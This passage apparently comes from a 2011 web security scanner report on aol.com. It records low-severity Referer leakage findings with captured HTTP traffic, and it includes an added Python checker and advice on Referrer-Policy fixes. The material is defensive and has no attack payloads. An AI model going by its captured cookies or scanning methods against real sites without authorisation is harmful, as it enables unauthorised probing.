<a href="http://www.huffingtonpost.com/2011/08/18/abigail-breslin-in-the-class-project_n_930172.html" name="om_trending-stories_img_6" class="lnid-sec6_lnk1 storyimg"><img src="http://i.huffpost.com/gen/332095/thumbs/s-BRESLIN-mini.jpg" alt="BRESLIN"/></a><p><a href="http://www.huffingtonpost.com/celebrity" name="om_trending-stories_attr_6" class="lnid-sec6_lnk3 storyattr">Celebrity</a>: <a href="http://www.huffingtonpost.com/2011/08/18/abigail-breslin-in-the-class-project_n_930172.html" name="om_trending-stories_link_6" class="lnid-sec6_lnk2 storytxt">Abigail Breslin Goes Dark: Teen Mom Murderer</a>
...[SNIP]...
<div class="story last">
<a href="http://www.mmafighting.com/2011/08/17/krzysztof-soszynski-says-at-least-85-percent-of-fighters-defini/" name="om_trending-stories_img_7" class="lnid-sec7_lnk1 storyimg"><img src="http://www.blogcdn.com/www.mmafighting.com/media/2011/08/ksos_74x58.jpg" alt=""/></a><p><a href="http://www.mmafighting.com" name="om_trending-stories_attr_7" class="lnid-sec7_lnk3 storyattr">MMA Fighting</a>: <a href="http://www.mmafighting.com/2011/08/17/krzysztof-soszynski-says-at-least-85-percent-of-fighters-defini/" name="om_trending-stories_link_7" class="lnid-sec7_lnk2 storytxt">Krzysztof Soszynski Says at Least 85 Percent of Fighters 'Definitely Using' PEDs</a>
...[SNIP]...
<div class="aol-twitter-like lnid-sec1_lnk2" id="om_followme_2_follow-me-module">
<a href="http://twitter.com/AOL" data-show-count="false" class="twitter-follow-button followmemodule_TWlike">Follow @AOL</a>
...[SNIP]...
</div>
<a name="om_followme_3" href="http://aol.it/jmiFya" class="nlm lnid-sec1_lnk3 last">Newsletter</a>
...[SNIP]...
<h2><a name="om_featured-blog-posts-feed_title" class="lnid-sec1_lnk1" href="http://www.huffingtonpost.com/theblog/index/">Featured Blog Posts</a>
...[SNIP]...
<div class="about">
<img class="headshot" alt="Bonnie Fuller" src="http://s.huffpost.com/contributors/bonnie-fuller/headshot.jpg"/>
<p class="vertical"><a href="http://www.huffingtonpost.com/entertainment" name="om_featured-blog-rss_sec2_vert" class="lnid-sec2_lnk1">ENTERTAINMENT</a>
...[SNIP]...
<h3 class="headline"><a href="http://www.huffingtonpost.com/bonnie-fuller/kim-kardashian-married_b_930798.html" name="om_featured-blog-rss_sec2_hl" class="headline lnid-sec2_lnk2">Kim Kardashian: 10 Tips to Make Your Marriage Last Forever</a>
...[SNIP]...
<p class="read"><a href="http://www.huffingtonpost.com/bonnie-fuller/kim-kardashian-married_b_930798.html" name="om_featured-blog-rss_sec2_read" class="read lnid-sec2_lnk3">Read Post</a> | <a href="http://www.huffingtonpost.com/bonnie-fuller/kim-kardashian-married_b_930798.html#comments" name="om_featured-blog-rss_sec2_cmnt" class="comments lnid-sec2_lnk4">Comments</a>
...[SNIP]...
<div class="about">
<img class="headshot" alt="Jon M. Sweeney" src="http://s.huffpost.com/contributors/jon-m-sweeney/headshot.jpg"/>
<p class="vertical"><a href="http://www.huffingtonpost.com/religion" name="om_featured-blog-rss_sec3_vert" class="lnid-sec3_lnk1">RELIGION</a>
...[SNIP]...
<h3 class="headline"><a href="http://www.huffingtonpost.com/jon-m-sweeney/lady-gaga-catholic_b_926420.html" name="om_featured-blog-rss_sec3_hl" class="headline lnid-sec3_lnk2">Is Lady Gaga Catholic?</a>
...[SNIP]...
<p class="read"><a href="http://www.huffingtonpost.com/jon-m-sweeney/lady-gaga-catholic_b_926420.html" name="om_featured-blog-rss_sec3_read" class="read lnid-sec3_lnk3">Read Post</a> | <a href="http://www.huffingtonpost.com/jon-m-sweeney/lady-gaga-catholic_b_926420.html#comments" name="om_featured-blog-rss_sec3_cmnt" class="comments lnid-sec3_lnk4">Comments</a>
...[SNIP]...
<div class="about">
<img class="headshot" alt="Melissa Lafsky" src="http://s.huffpost.com/contributors/melissa-lafsky/headshot.jpg"/>
<p class="vertical"><a href="http://www.huffingtonpost.com/women" name="om_featured-blog-rss_sec4_vert" class="lnid-sec4_lnk1">WOMEN</a>
...[SNIP]...
<h3 class="headline"><a href="http://www.huffingtonpost.com/melissa-lafsky/5-truths-about-your-paren_b_930216.html" name="om_featured-blog-rss_sec4_hl" class="headline lnid-sec4_lnk2">5 Truths About Your Parents That No One Tells You</a>
...[SNIP]...
<p class="read"><a href="http://www.huffingtonpost.com/melissa-lafsky/5-truths-about-your-paren_b_930216.html" name="om_featured-blog-rss_sec4_read" class="read lnid-sec4_lnk3">Read Post</a> | <a href="http://www.huffingtonpost.com/melissa-lafsky/5-truths-about-your-paren_b_930216.html#comments" name="om_featured-blog-rss_sec4_cmnt" class="comments lnid-sec4_lnk4">Comments</a>
...[SNIP]...
<a title="Child Preacher" name="om_vidfeat_image1" class="lnid-sec2_lnk1 icid-BTFimage3" href="http://video.aol.com/video/pint-sized-preacher/92871091"><img alt="Child Preacher" src="http://o.aolcdn.com/hss/storage/adam/92353343297a85c42004c42fcbe733d8/pint-sized-preacher.jpg"/></a>
...[SNIP]...
<a title="doughnuts!" name="om_vidfeat_image2" class="lnid-sec3_lnk1 icid-BTFimage1" href="http://video.aol.com/video/how-to-make-homemade-doughnuts/590730756"><img alt="doughnuts!" src="http://o.aolcdn.com/hss/storage/adam/5d60ce9fc3d0b921b344beb563fba9e8/CIA-Class_MG_1804-456.jpg"/></a>
...[SNIP]...
<a title="Flawless skin" name="om_vidfeat_image3" class="lnid-sec4_lnk1 icid-BTFimage2" href="http://video.aol.com/video/flawless-face-how-to-cover-up-acne/2545363948"><img alt="Flawless skin" src="http://o.aolcdn.com/hss/storage/adam/b9a2ef60d3c7ed958f77bf69067923d/flawless-face-how-to-cover-up-acne.jpg"/></a>
...[SNIP]...
<div class="mpid-9">
<img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=aolcom_cs=1&betq=13668=438747" width="1" height="1" border="0" /> </div>
...[SNIP]...
<span class="mnid-brand-3 plid-75012"><a class="lnid-sec1_lnk1 icid-brandfooter_shoutcast brand62" href="http://www.shoutcast.com/" name="om_brands_shoutcast">Shoutcast</a>
...[SNIP]...
<span class="mnid-brand-4 plid-75014"><a class="lnid-sec1_lnk1 icid-brandfooter_tuaw brand31" href="http://www.tuaw.com/" name="om_brands_tuaw">TUAW</a>
</span><span class="mnid-brand-5 plid-79342"><a class="lnid-sec1_lnk1 icid-brandfooter_gamescom brand18" href="http://www.games.com/" name="om_brands_gamescom">Games.com</a>
...[SNIP]...
<span class="mnid-brand-8 plid-75105"><a class="lnid-sec1_lnk1 icid-brandfooter_boombox brand36" href="http://www.theboombox.com/" name="om_brands_boombox">Boombox</a>
...[SNIP]...
</font><a href="http://bit.ly/btxTZj" class="fb lnid-sec1_lnk9" target="_blank" name="om_followme1">Facebook</a>
...[SNIP]...
</a> | <a href="http://bit.ly/cCSb2K" class="rss lnid-sec1_lnk11" target="_blank" name="om_followme3">RSS</a>
...[SNIP]...
</div>
<script type="text/javascript" src="http://portal.aolcdn.com/p5/_v58.6/js/main.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/videoplayer/loader.js"></script>
<script type="text/javascript" src="http://player.play.it/player/launchAolPlayer.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

6.3. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=14&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
Referer: http://www.aol.com/
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_getnr%3D1313705645120-New%7C1376777645120%3B%20s_nrgvo%3DNew%7C1376777645122%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; CUNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; rrpmo1=rr1~1~1313705624439~0; stips5=1; dlact=dl14

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:16:22 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-106-87.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2610
Set-Cookie: JSESSIONID=EFC69B3359D612748FD2BD602BD34F21; Path=/aol
Content-Length: 2610

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl14 plid-87511 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
</span>
<a id="dlimg" name="om_dl14_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl14|sec1_lnk1|87511" href="http://www.huffingtonpost.com/2011/08/18/gary-giordano-insurance_n_930309.html#s326251&amp;title=Robyn_Gardner "><img height="217" width="386" src="http://o.aolcdn.com/hss/storage/adam/b560b19bba6663df5ff514ee58f7010a/giordano-gardner-386cm081811.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl14_hdln" href="http://www.huffingtonpost.com/2011/08/18/gary-giordano-insurance_n_930309.html#s326251&amp;title=Robyn_Gardner " class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl14|sec1_lnk2|87511">Disturbing Development in Aruba Case
</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl14_cpy" href="http://www.huffingtonpost.com/2011/08/18/gary-giordano-insurance_n_930309.html#s326251&amp;title=Robyn_Gardner " class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl14|sec1_lnk3|87511">'Beyond pornographic' shots on his camera</a>
...[SNIP]...
<li ><a name="om_dl14_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl14|sec3_lnk1|87511" href="http://www.huffingtonpost.com/2011/08/18/peter-kinder-stripper_n_930427.html ">Gov. Answers Stripper Allegations</a>
...[SNIP]...
<li ><a name="om_dl14_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl14|sec3_lnk2|87511" href="http://www.huffingtonpost.com/2011/08/18/uae-tweeting-rumors-can-result-in-jail-time_n_929351.html?1313679302 ">Twitter Rumors Leads to Jail Time?
</a>
...[SNIP]...
<li ><a name="om_dl14_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl14|sec3_lnk3|87511" href="http://www.huffingtonpost.com/2011/08/18/los-angeles-downgraded-by_n_930296.html ">Major US City Downgraded by S&P
</a>
...[SNIP]...
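
What this finding means in practice: the page above was fetched from a URL carrying a query string, and its body links off-host (here to www.huffingtonpost.com). When a user follows one of those links, the browser sends the full page URL, query string included, in the Referer header to the other domain. The check below reproduces that passive test over a captured request/response pair and also computes the Referer value a browser would send under different Referrer-Policy settings. It is an added example, not code from the XSS.CX report or from the scanner that produced it; the sample request and response are constructed from finding 6.3 and shortened, and the policy names follow the W3C Referrer Policy specification, which post-dates this 2011 report.

```python
import re
from urllib.parse import urljoin, urlsplit

# Anchor hrefs only: the "links to other domains" the scanner reports are <a href>
# targets. (Image loads send a Referer too, but are not what this issue flags.)
ANCHOR_HREF = re.compile(r'<a\b[^>]*?\bhref\s*=\s*["\']([^"\']*)["\']', re.I | re.S)


def _split_message(raw: str):
    """Split a raw HTTP message into (header lines, body)."""
    sep = "\r\n\r\n" if "\r\n\r\n" in raw else "\n\n"
    head, _, body = raw.partition(sep)
    return head.splitlines(), body


def request_url(raw_request: str) -> str:
    """Rebuild the absolute URL from the request line and the Host header.
    The report's traffic is plain HTTP, so the 'http' scheme is assumed here."""
    head, _ = _split_message(raw_request)
    _method, target, _version = head[0].split(" ", 2)
    host = next(h.split(":", 1)[1].strip() for h in head[1:] if h.lower().startswith("host:"))
    return f"http://{host}{target}"


def cross_domain_links(raw_request: str, raw_response: str):
    """Return (page_url, links): absolute <a href> targets whose host differs from
    the requested host. Like the scanner, any different hostname counts, so a
    sibling such as realestate.aol.com is reported next to true third parties."""
    page = request_url(raw_request)
    page_host = (urlsplit(page).hostname or "").lower()
    _, body = _split_message(raw_response)  # parsed as HTML even though the report's
    links = []                               # Content-Type header says text/javascript
    for href in ANCHOR_HREF.findall(body):
        target = urljoin(page, href.strip())  # several hrefs in the report end in a space
        host = (urlsplit(target).hostname or "").lower()
        if host and host != page_host and target not in links:
            links.append(target)
    return page, links


def leaks_query_string(raw_request: str, raw_response: str) -> bool:
    """The issue fires only when the page URL carries a query string AND the
    response links off-host: following such a link sends the page URL in Referer."""
    page, links = cross_domain_links(raw_request, raw_response)
    return bool(urlsplit(page).query) and bool(links)


def referer_sent(page_url: str, target_url: str,
                 policy: str = "no-referrer-when-downgrade"):
    """Referer a browser sends when navigating page_url -> target_url under the
    named Referrer-Policy (four of the spec's policies; the fragment is never
    sent). The default matches what the 2011 browsers in this report did."""
    p, t = urlsplit(page_url), urlsplit(target_url)
    same_origin = (p.scheme, p.hostname, p.port) == (t.scheme, t.hostname, t.port)
    downgrade = p.scheme == "https" and t.scheme == "http"
    full = page_url.split("#", 1)[0]
    origin = f"{p.scheme}://{p.netloc}/"
    if policy == "no-referrer":
        return None
    if policy == "no-referrer-when-downgrade":
        return None if downgrade else full
    if policy == "same-origin":
        return full if same_origin else None
    if policy == "strict-origin-when-cross-origin":
        if downgrade:
            return None
        return full if same_origin else origin
    raise ValueError(f"unsupported policy: {policy}")


# Constructed sample, cut down from finding 6.3 above (not the full capture).
SAMPLE_REQUEST = (
    "GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&dlNo=14&ajax=1 HTTP/1.1\r\n"
    "Host: www.aol.com\r\n"
    "Referer: http://www.aol.com/\r\n"
    "\r\n"
)
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/javascript;charset=UTF-8\r\n"
    "\r\n"
    '<a id="dlimg" name="om_dl14_image" class="photo-link" href="http://www.huffingtonpost.com/'
    '2011/08/18/gary-giordano-insurance_n_930309.html#s326251&amp;title=Robyn_Gardner ">'
    '<img src="http://o.aolcdn.com/hss/storage/adam/x.jpg"/></a>\n'
    '<li><a name="om_dl14_slede1" href="http://www.huffingtonpost.com/2011/08/18/'
    'peter-kinder-stripper_n_930427.html ">Gov. Answers Stripper Allegations</a>\n'
    '<a href="/ajax.jsp?m=dynamiclead&dlNo=15">same host, not reported</a>\n'
)

if __name__ == "__main__":
    page, links = cross_domain_links(SAMPLE_REQUEST, SAMPLE_RESPONSE)
    print("leaks:", leaks_query_string(SAMPLE_REQUEST, SAMPLE_RESPONSE))
    for link in links:
        print(link, "<- Referer:", referer_sent(page, link))
        print("   with strict-origin-when-cross-origin:", referer_sent(page, link, "strict-origin-when-cross-origin"))
```

Two caveats when triaging. First, the query string in these requests carries only slideshow state (m, p, dlNo, slot, vcslot), so the Referer that reaches huffingtonpost.com here discloses nothing sensitive; the same pattern on a URL that carries a session token, password-reset token or search terms is a real leak, which is why the scanner reports it at Information severity rather than ignoring it. Second, the fix is on the linking site, not the destination: send a Referrer-Policy response header (strict-origin-when-cross-origin trims cross-origin navigations to the origin, as the example computes) or add rel="noreferrer" to the outbound anchors, and keep secrets out of URLs in the first place.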

6.4. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=19&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
Referer: http://www.aol.com/
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_getnr%3D1313705645120-New%7C1376777645120%3B%20s_nrgvo%3DNew%7C1376777645122%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; CUNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; rrpmo1=rr1~1~1313705624439~0; stips5=1; dlact=dl19

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:17:17 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-107-91.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2609
Set-Cookie: JSESSIONID=9ABD893C88B5D46CE97808363F775847; Path=/aol
Content-Length: 2609

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl19 plid-87572 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
om_dl19_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl19|sec1_lnk1|87572" href="http://realestate.aol.com/blog/2011/08/18/house-of-the-day-role-play-prez-in-white-house-lookalike/ "><img height="217" width="386" src="http://i.huffpost.com/gen/332727/thumbs/a-WHITE-HOUSE-386x217.jpg"/></a>
...[SNIP]...

6.5. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=16&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
Referer: http://www.aol.com/
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_getnr%3D1313705645120-New%7C1376777645120%3B%20s_nrgvo%3DNew%7C1376777645122%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; CUNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; rrpmo1=rr1~1~1313705624439~0; stips5=1; dlact=dl16

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:16:43 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-173-45.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2467
Set-Cookie: JSESSIONID=BB8D8A2B14F0237DD3134B8746CDEBED; Path=/aol
Content-Length: 2467

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl16 plid-87497 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
</span>
<a id="dlimg" name="om_dl16_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl16|sec1_lnk1|87497" href="http://www.huffingtonpost.com/2011/08/18/skype-wedding-dying-mother_n_930134.html"><img height="217" alt="Andrea Coily and Husband" width="386" src="http://o.aolcdn.com/hss/storage/adam/ccad2e1b434371168f2a814bc352065/wedding-386az08182011.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl16_hdln" href="http://www.huffingtonpost.com/2011/08/18/skype-wedding-dying-mother_n_930134.html" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl16|sec1_lnk2|87497">'Most Emotional Ceremony I've Seen'</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl16_cpy" href="http://www.huffingtonpost.com/2011/08/18/skype-wedding-dying-mother_n_930134.html" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl16|sec1_lnk3|87497">So they figured out the next best thing
</a>
...[SNIP]...
<li ><a name="om_dl16_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl16|sec3_lnk1|87497" href="http://www.huffingtonpost.com/2011/08/18/bebe-workwear_n_930391.html">Would You Wear This to Work? </a>
...[SNIP]...
<li ><a name="om_dl16_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl16|sec3_lnk2|87497" href="http://www.stylelist.com/2011/08/18/missoni-for-target-bobby-pins_n_929712.html">New Target Item Put to the Test</a>
...[SNIP]...
<li ><a name="om_dl16_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl16|sec3_lnk3|87497" href="http://www.stylelist.com/2011/08/18/solange-knowles-style_n_930040.html">Solange Knowles in Colorful Outfit </a>
...[SNIP]...

6.6. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=20&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
Referer: http://www.aol.com/
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_getnr%3D1313705645120-New%7C1376777645120%3B%20s_nrgvo%3DNew%7C1376777645122%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; CUNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; rrpmo1=rr1~1~1313705624439~0; stips5=1; dlact=dl20

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:17:30 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-106-83.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2592
Set-Cookie: JSESSIONID=D38C72229768D1BC2C472EAAFBDBB0A9; Path=/aol
Content-Length: 2592

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl20 plid-87417 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
</span>
<a id="dlimg" name="om_dl20_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl20|sec1_lnk1|87417" href="http://www.huffingtonpost.com/2011/08/17/yard-sale-medical-bills-jan-cline-cancer_n_929911.html?1313619055"><img height="217" alt="Jan Cline" width="386" src="http://o.aolcdn.com/hss/storage/adam/48579d32e409f517017b94388ca4837a/sale-386az08182011.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl20_hdln" onclick=" " href="http://www.huffingtonpost.com/2011/08/17/yard-sale-medical-bills-jan-cline-cancer_n_929911.html?1313619055" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl20|sec1_lnk2|87417">Cancer Patient's Yard Sales Shuttered</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl20_cpy" href="http://www.huffingtonpost.com/2011/08/17/yard-sale-medical-bills-jan-cline-cancer_n_929911.html?1313619055" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl20|sec1_lnk3|87417">Then she got a notice from the city
</a>
...[SNIP]...
<li ><a name="om_dl20_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl20|sec3_lnk1|87417" href="http://www.huffingtonpost.com/eatingwell/sunburn-remedies_b_924642.html">4 Foods That Soothe a Sunburn</a>
...[SNIP]...
<li ><a name="om_dl20_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl20|sec3_lnk2|87417" href="http://www.huffingtonpost.com/2011/08/17/kids-nut-allergy-teased-excluded_n_929809.html">How Kids With Nut Allergies Feel </a>
...[SNIP]...
<li ><a name="om_dl20_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl20|sec3_lnk3|87417" href="http://www.huffingtonpost.com/2011/08/18/second-language-toddlers_n_929248.html">Toddlers Who May Have an Edge
</a>
...[SNIP]...

6.7. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=13&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
Referer: http://www.aol.com/
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_getnr%3D1313705645120-New%7C1376777645120%3B%20s_nrgvo%3DNew%7C1376777645122%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; CUNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; rrpmo1=rr1~1~1313705624439~0; stips5=1; dlact=dl13

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:16:09 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-106-88.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2565
Set-Cookie: JSESSIONID=B9F7370BCEB98D0ACC0CDAFF73CC8AD5; Path=/aol
Content-Length: 2565

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl13 plid-87524 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
<a id="dlimg" name="om_dl13_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl13|sec1_lnk1|87524" href="http://autos.aol.com/article/michele-bachmanns-2-gas-sideshow/"><img height="217" alt="Republican presidential candidate, Rep. Michele Bachmann, R-Minn., speaks to supporters at the Beacon Drive-in, Tuesday, Aug. 16, 2011, in Spartanburg, S.C." width="386" src="http://i.huffpost.com/gen/332591/thumbs/a-BACHMANGAS-386x217.jpg"/></a>
...[SNIP]...
<li ><a name="om_dl13_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl13|sec3_lnk1|87524" href="http://www.autoblog.com/2011/08/17/r-c-car-takes-hydroplaning-to-a-new-level/">Watch: Tiny Car Rides on Water</a>
...[SNIP]...
